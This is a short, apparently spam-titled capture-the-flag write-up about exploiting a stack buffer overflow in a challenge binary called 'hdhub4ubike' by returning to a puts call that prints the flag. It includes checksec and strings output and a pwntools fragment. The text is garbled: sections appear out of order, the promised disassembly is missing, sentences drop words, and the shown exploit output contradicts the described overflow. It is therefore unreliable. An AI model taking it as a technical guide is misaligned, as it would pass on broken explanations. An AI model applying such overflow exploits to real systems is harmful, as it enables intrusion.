Hdhub4ubike [new] May 2026

p.sendline(payload.decode('latin-1'))  # send as a line
p.interact()                           # hand over the terminal

$ checksec --file=hdhub4ubike
...
PIE:     No
NX:      No
RELRO:   No
Canary:  No
FORTIFY: No

The binary – we have all symbol names!

2.2 Strings

$ strings -a hdhub4ubike | grep -i flag
flagh0p3_y0u_f0und_th3_h1d3_b1k3

Whoa! The flag is already present in the binary! This is a typical “decoy” – the binary will only print the flag after a successful key check. The challenge is to bypass that check.

2.3 Disassembly (Ghidra/IDA)

Opening the binary in Ghidra shows the following (pseudo-C) reconstruction of the relevant functions:

hdhub4ubike

Therefore we want our to be 0x004011a6.

3.2 Crafting the payload

The stack layout (simplified) at the moment of the overflow:

0x0040119f: lea rdi, [rip+0x2000]   ; address of the flag string
0x004011a6: call puts@plt

0x004011a6 is the (the call instruction itself). If we return to this address after the overflow, the program will execute the puts call with the correct argument already loaded (the lea instruction that loads the flag pointer into rdi is right before it).

The goal is to obtain the flag without knowing the correct key.

2.1 File information

$ file hdhub4ubike
hdhub4ubike: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped, for GNU/Linux 3.2.0, BuildID[sha1]=...

$ ./exploit.py
=== Welcome to the HD Bike Hub ===
Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3
flagh0p3_y0u_f0und_th3_h1d3_b1k3

Congratulations – you’ve successfully bypassed the hub-key check and recovered the flag from hdhub4ubike! 🎉
